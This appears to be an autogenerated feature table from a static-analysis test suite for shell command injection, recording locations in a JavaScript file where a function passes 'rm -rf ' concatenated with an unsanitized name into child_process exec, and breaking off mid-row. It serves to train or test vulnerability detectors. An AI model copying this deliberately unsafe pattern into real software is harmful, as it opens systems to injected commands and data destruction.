autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:8 | cp.exec | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:2:258:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:5:258:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:5:258:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:5:258:8 | exec | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:5:258:8 | exec | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:5:258:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:18 | "rm -rf " | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:10:258:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:22:258:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:22:258:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:22:258:25 | name | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:22:258:25 | name | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:22:258:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:258:22:258:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:6:260:37 | !fs.exi ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:6:260:37 | !fs.exi ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:6:260:37 | !fs.exi ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:6:260:37 | !fs.exi ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:6:260:37 | !fs.exi ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:8 | fs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:8 | fs | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:8 | fs | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:8 | fs | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:8 | fs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:19 | fs.existsSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:19 | fs.existsSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:19 | fs.existsSync | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:19 | fs.existsSync | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:19 | fs.existsSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | exceptional return of fs.exis ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | exceptional return of fs.exis ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | exceptional return of fs.exis ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | exceptional return of fs.exis ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | exceptional return of fs.exis ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:7:260:37 | fs.exis ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:10:260:19 | existsSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:10:260:19 | existsSync | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:10:260:19 | existsSync | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:10:260:19 | existsSync | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:10:260:19 | existsSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:29 | "prefix/" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:29 | "prefix/" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:29 | "prefix/" | enclosingFunctionBody | name cp exec rm -rf name fs existsSync prefix/ name cp exec rm -rf prefix/ name cp exec rm -rf prefix/ name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:29 | "prefix/" | enclosingFunctionName | guard2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:29 | "prefix/" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:29 | "prefix/" | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | CalleeFlexibleAccessPath | fs.existsSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | calleeImports | fs | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:260:21:260:36 | "prefix/" + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 